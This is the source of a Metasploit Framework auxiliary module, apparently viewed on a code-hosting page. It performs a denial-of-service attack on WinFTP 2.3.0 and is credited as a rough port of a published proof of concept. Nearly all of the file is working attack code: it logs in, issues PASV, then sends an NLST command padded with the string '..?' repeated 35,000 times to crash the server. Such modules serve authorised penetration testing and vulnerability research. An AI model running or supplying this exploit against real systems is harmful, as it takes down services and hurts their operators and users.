metasploit-framework/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb

47 lines
1.1 KiB
Ruby
Raw Normal View History

##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'WinFTP 2.3.0 NLST Denial of Service',
'Description' => %q{
This module is a very rough port of Julien Bedard's
PoC. You need a valid login, but even anonymous can
do it if it has permission to call NLST.
},
'Author' => 'kris katterjohn',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[ [ 'URL', 'http://milw0rm.com/exploits/6581'] ],
'DisclosureDate' => 'Sep 26 2008'))
end
def run
return unless connect_login
raw_send_recv("PASV\r\n") # NLST has to follow a PORT or PASV
sleep(1) # *sigh* this appears to be necessary in my tests
raw_send("NLST #{'..?' * 35000}\r\n")
disconnect
end
end